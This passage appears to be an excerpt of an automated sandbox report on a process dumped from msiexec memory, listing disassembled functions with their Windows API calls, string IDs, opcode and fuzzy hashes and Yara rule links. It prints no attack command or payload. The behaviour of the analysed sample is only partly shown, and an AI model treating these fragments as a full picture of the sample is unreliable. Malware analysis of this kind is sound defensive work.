                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                    • String ID: "
                                                                                                    • API String ID: 1983396471-123907689
                                                                                                    • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                    • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                    Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                    • _memicmp.MSVCRT ref: 0040C00D
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                    • String ID: URL
                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                    • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                    • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                    • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                    • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                    Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 2789212964-323797159
                                                                                                    • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                    • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                    Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf
                                                                                                    • String ID: %%-%d.%ds
                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                    • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                    • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                    Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                    • memset.MSVCRT ref: 00401917
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PlacementWindowmemset
                                                                                                    • String ID: WinPos
                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                    • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                    • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                    Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@DeleteObject
                                                                                                    • String ID: r!A
                                                                                                    • API String ID: 1103273653-628097481
                                                                                                    • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                    • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                    Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 383090722-1948609170
                                                                                                    • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                    • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                    Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                    • API String ID: 2773794195-880857682
                                                                                                    • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                    • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                    Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: MZ@
                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                    Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                    • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                    Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                    • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                    Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: bd9c2fbdafd9bd1a8ecc8c4fb1ddbe2ec69d0e4c44f89de98d5280552e6ae643
                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                    • Opcode Fuzzy Hash: bd9c2fbdafd9bd1a8ecc8c4fb1ddbe2ec69d0e4c44f89de98d5280552e6ae643
                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                    Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                    • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: 02065ffbab0da3b6fd023f8001c1f0d8f69e37638dea0663f36a40e88b4833f8
                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                    • Opcode Fuzzy Hash: 02065ffbab0da3b6fd023f8001c1f0d8f69e37638dea0663f36a40e88b4833f8
                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                    Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 231171946-0
                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                    Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3669619086-0
                                                                                                    • Opcode ID: 33c6c4480df7d418dc9e483023a9b809fbb92cfa1889a22cfd9cfc0c18e735dc
                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                    • Opcode Fuzzy Hash: 33c6c4480df7d418dc9e483023a9b809fbb92cfa1889a22cfd9cfc0c18e735dc
                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                    • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                    Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                    • malloc.MSVCRT ref: 00417407
